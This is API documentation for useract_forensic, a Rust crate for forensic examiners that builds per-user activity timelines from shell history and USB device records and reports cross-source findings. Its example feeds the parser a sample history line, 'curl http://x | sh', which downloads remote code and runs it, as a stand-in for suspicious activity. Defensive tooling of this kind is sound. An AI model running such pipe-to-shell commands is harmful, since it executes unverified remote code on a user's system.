Skip to main content

Crate useract_forensic

Crate useract_forensic 

Source
Expand description

useract-forensic — the user-activity correlation layer.

A thin meta / orchestration crate: it does not parse any raw format itself. It consumes already-decoded forensic reader types — today shellhist_core::HistoryEntry and peripheral_core::DeviceConnection — normalizes them into one uniform UserActivity event, builds a per-user timeline, and emits cross-source forensicnomicon::report::Findings that no single source could produce alone.

Every finding is an observation (“consistent with …”); the examiner draws the conclusions. MITRE techniques are narrated as consistency, never a verdict.

§30-second example

use useract_forensic::{build_timeline, audit, ShellHistorySource, DeviceSource};
use shellhist_core::{HistoryEntry, Shell};

// (sources are normally produced by the reader crates; constructed here inline)
let entries = shellhist_core::parse_auto(b"#1700000000\ncurl http://x | sh\n", Some(".bash_history"));
let shell = ShellHistorySource::new(&entries);
let devices = DeviceSource::new(&[]);

let timeline = build_timeline(&[&shell, &devices]);
let findings = audit(&timeline);
for f in &findings {
    println!("{} — {}", f.code, f.note);
}

§v0.2 roadmap

New per-user sources slot in behind the ActivitySource trait without an API break: lnk-core (recent-file LNK, completing the volume-serial join), shellbag-core (folder access), srum-core (per-user app execution and network bytes by SID — the strongest source), and winreg-artifacts (UserAssist / RecentDocs / MRU / MountPoints2). See docs/roadmap.md.

Structs§

DeviceSource
A DeviceSource wraps a borrowed slice of decoded device connections.
ShellHistorySource
A ShellHistorySource wraps a borrowed slice of decoded history entries.
UserActivity
One normalized user-activity event: who did what, when, to which subject.

Enums§

Action
What a user did to a Subject.
SourceKind
Which reader the activity was normalized from.
Subject
The thing an Action was performed on.

Constants§

REMOVABLE_MEDIA_WINDOW_SECS
The default temporal window (seconds) for the exec-during-removable-media join.

Traits§

ActivitySource
A producer of UserActivity events.

Functions§

audit
Audit a merged timeline for cross-source user-activity findings.
audit_with
audit with a caller-supplied Source stamp (scope/version).
build_timeline
Merge any number of ActivitySources into one timeline, sorted by timestamp.
device_file_volume_joins
Generic volume-serial join: pair every Subject::Device activity with every Subject::File / Subject::Folder activity that names the same volume serial.
from_device_connections
Normalize a decoded device-connection stream into UserActivity events.
from_shell_history
Normalize a decoded shell-history stream into UserActivity events.
source
The Source stamp for findings this analyzer emits.